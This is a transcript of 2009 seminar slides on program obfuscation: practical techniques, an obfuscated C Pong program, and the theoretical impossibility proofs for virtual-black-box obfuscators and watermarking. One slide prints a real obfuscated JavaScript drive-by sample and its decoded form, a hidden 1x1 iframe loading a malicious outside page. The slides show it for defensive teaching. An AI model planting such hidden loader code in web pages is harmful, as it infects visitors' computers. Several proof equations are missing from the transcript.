seminar in cryptographic protocols: program obfuscation omer singer june 8, 2009

Post on 16-Dec-2015

217 Views

Category:

Documents

0 Downloads

Preview:

Click to see full reader

TRANSCRIPT

Seminar in Cryptographic Protocols: Program Obfuscation

Omer SingerJune 8, 2009

Practical Background

What is program obfuscation?

• Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.

• “The art of making things appear more complicated”

Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html

What does this function do?

• Three main values:– Potency – Resilience– Cost

• Many methods in use:– Modify variable names and layout– Replace integer values with complex equations– Change program flow– Modify data structures– Anti-disassembly (“armored” viruses)– Anti-debugging

And now for some seriously obfuscated programs…

Winner of the international C obfuscation contest in 1996

Shows the time on a clock with a configurable face and style

Winner of the international C obfuscation contest in 2001

Network-based Pong game

#include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(struct sockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_set I;struct socka\ ddr_in il;struct host\ ent*LI; struct timeval IL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);}

No more fun and games…

Actual web code blocked by an Intrusion Prevention System at a client:

<Script Language='Javascript'><!--document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C

%45%3E%3C%2F%54%49%54%4C%45%3E%0A%3C%2F%48%45%41%44%3E%0A%3C%42%4F%44%59%20%6C%65%66%74%6D%61%72%67%69%6E%3D%30%20%74%6F%70%6D%61%72%67%69%6E%3D%30%20%72%69%67%68%74%6D%61%72%67%69%6E%3D%30%20%62%6F%74%74%6F%6D%6D%61%72%67%69%6E%3D%30%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%30%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%30%3E%0A%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%66%73%6F%69%70%61%61%77%61%2E%63%6F%6D%2F%65%77%69%6F%71%61%2F%22%3E%3C%49%4D%47%20%73%72%63%3D%22%62%61%6E%6E%65%72%32%2E%67%69%66%22%20%77%69%64%74%68%3D%22%33%30%32%22%20%68%65%69%67%68%74%3D%22%32%35%32%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%61%3E%0A%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%78%63%7A%78%6F%2E%69%6E%66%6F%2F%6D%70%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%6E%6F%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%0A%0A%3C%2F%42%4F%44%59%3E%0A%3C%2F%48%54%4D%4C%3E'));

//--></Script>

When unobfuscated…

<HTML><HEAD><TITLE></TITLE></HEAD><BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0

marginwidth=0>

<a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a>

<iframe src="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>

</BODY></HTML>

Source: http://www.finjan.com/Content.aspx?id=1456

Source: http://www.finjan.com/Content.aspx?id=1456

• Obfuscation helps to bypass antivirus, delay security research response

• Obfuscated web code is often the first step in a “drive-by download” attack

• When the web code is executed by the browser it calls programs to target local software

• Result is infection of the user’s computer

Source: http://viruslist.com/en/analysis?pubid=204792056

Source: http://viruslist.com/en/analysis?pubid=204792056

Google Search Results Containing a Harmful URL

Attempt to calculate impact of obfuscated online attacks:

1 http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf2 http://viruslist.com/en/analysis?pubid=2047920563 http://www.securityfocus.com/brief/846

74% of malware spread via compromised websites2

80% of browser-based attacks are now obfuscated3

= $7.8 billion

$13.2 billion direct damages of malware1

Knowing is half the battle…

A few tips to stop obfuscated “drive-by download” attacks

• Use NoScript to block active content on Firefox

• Don’t click on web ads

• Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.

Program obfuscation has some positive uses as well!

• Preventing source code theft– Disrupt reverse engineering– Block code copying– Especially important with the increased use of

Java and .NET languages such as C# and Visual Basic which do not compile to machine code

– Microsoft recommends obfuscating ASP files in case of server compromise

• Watermarking and Digital Rights Management (DRM)

“If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.”

- Chris WysopalGood Obfuscation, Bad Code

Definitions

Oracle Access

• Used by [B+] to facilitate adversary model• The oracle is some function• Adversary makes query q to the oracle, receives

answer f(q)• Useful when studying obfuscation: oracle serves

as an interface to the program without exposing contents

q q

f(q) f(q)Adversary Oracle Program

Adversary with Oracle Access

Virtual Black Box

Anything one can efficiently compute from a virtual black box, one should be able to efficiently compute given just oracle access to the program.

In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.

Speaks Spanish Answers in the form of a question

qf(q)

Tell me about yourself

¿Que quieres saber?

Adversary with access to the

virtual black box

Simulator with oracle

access to the function

Circuit

In the [B+] paper on obfuscation, a circuit represents a finite length Turing machine.

• Circuits are easier to put in a virtual black box.

• Therefore obfuscating circuits is easier than obfuscating TMs.

• Proofs in the [B+] paper first prove theorems for TM then can easily extend to circuits.

Obfuscators

• An obfuscator is an algorithm О that will restrict what an adversary can learn about P given O(P).

• What is the adversary trying to achieve?– A program that produces the same output as P – A program that produces output with some

relation to the output of P– A function that computes some function of P– Decide some property of P

• The last achievement is the weakest, we want to prove that it is impossible.

General Impossibility Proof

TM Obfuscator

A probabilistic algorithm O is a TM obfuscator if the following conditions hold…

Functionality:

For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.

Polynomial slowdown:

The description length and running time of O(M) are at most polynomially larger than those of M

“Virtual black box” property:

For any PPT A, there is a PPT S and a negligible function α such that for all TMs M

Circuit Obfuscator

• Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length

• Hence the proposition:

If a TM obfuscator exists, then a circuit obfuscator exists

• Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows

Unobfuscatable Circuit Ensemble

• A family of circuits such that:– Every circuit c in the family is efficient– There exists a predicate π(c) such that• π(c) is hard to compute with oracle access to the

function that c computes• π(c) is easy to compute with access to any circuit c’

that computes the same function as c

Main Proof Structure

[B+] structure their Proof the Main Impossibility Result as follows:

1. Define obfuscators that are secure when applied to two programs

2. Show that such obfuscators do not exist3. Modify the construction to prove that

TM/circuit obfuscators do not exist4. Show how this proof yields an unobfuscatable

function ensemble

2-TM Obfuscator

A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.

• Formal definition of the strengthened “virtual black box” property:

Adversary with access to two

obfuscated TMs

Simulator with oracle access to

the two TMs

Proposition:

According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.

Proof by contradiction…

• Suppose that there exists a 2-TM obfuscator O.• Consider a function that cannot be learned by oracle queries, for example the following Turing machine:

• Define another Turing machine such that:

• Consider an adversary A such that:A (C,D) = D(C)

Then for any α,β:

Therefore S with oracle access to and must output 1 and with oracle access to and must output 0…but S cannot differentiate between the two so we have a contradiction.

The combination of the these equations contradict the fact that O is a 2-TM obfuscator:

Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that:

In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.

TM Obfuscator

• [B+] extend the two-program obfuscation impossibility result to single program obfuscation.

• The extension is based on the ability to combine functions/TMs

In [B+] the combination of two functions is defined as .

A program C is decomposed into by setting .

By this definition, having oracle access to a combined function is the same as having oracle access to

and individually.

Theorem: TM obfuscators do not exist.

The adversary A is the same as before only modified to decompose the program that it receives.

Suppose for the sake of contradiction that exists TM obfuscator O.

These equations contradict the virtual black-box property required for O being a TM obfuscator.

• In [B+] this proof is extended to circuit obfuscators.

• The challenge with extending to circuit obfuscators is greater than expected– Size of the circuit is greater than the input length– Adapt the proof using homomorphic encryption

properties

Unobfuscatable Circuit Ensembles

• The case against obfuscators is further strengthened by proving the existence of unobfuscatable circuit ensembles.

The unobfuscatable circuit ensemble is defined as

Reminder:

We can now show that given any circuit that computes the same function as , we can reconstruct the latter.

• Since D’ computes the same function as D and , we have

• We can now reconstruct

Indistinguishability Obfuscator• Obfuscation models weaker than the “virtual black

box” may still be useful for software protection

• Indistinguishability obfuscator:Obfuscations of equivalent circuits of the same size

should be computationally indistinguishable.

• Later works have shown this model to be impossible to achieve as well

Software Watermarking

We would like to be able to “watermark” a program such that the code will always have a certain identifier that cannot be removed.

• A good software watermarking scheme should have the following properties:– Functionality: The marked program computes the same

function as the original program.– Meaningfulness: Most other programs don’t have this

marking.– Fragility: It is infeasible to remove the mark from the

program without (substantially) changing its behavior.

• [B+] sought to formalize the watermarking problem as it relates to obfuscation.

• [B+] sketch a proof showing that no such watermarking scheme exists.

• For any unobfuscatable program, we know that an adversary will be able to take the obfuscated (marked) program and reconstruct the (unmarked) source code.

Conclusion

• [B+] have made progress in formalizing the concept of program obfuscation.

• They have shown that the “virtual black box” paradigm is impossible to satisfy.

• Somewhat strong obfuscation of some programs remains a possibility

• Program obfuscation has an increasingly important role in the race between hackers and the information security community.

• Additional research must be made in order to increase the effectiveness of malware detection.

• Significant progress in obfuscation techniques may break the current signature-based detection model.

Final Thoughts

Thanks for listening!

top related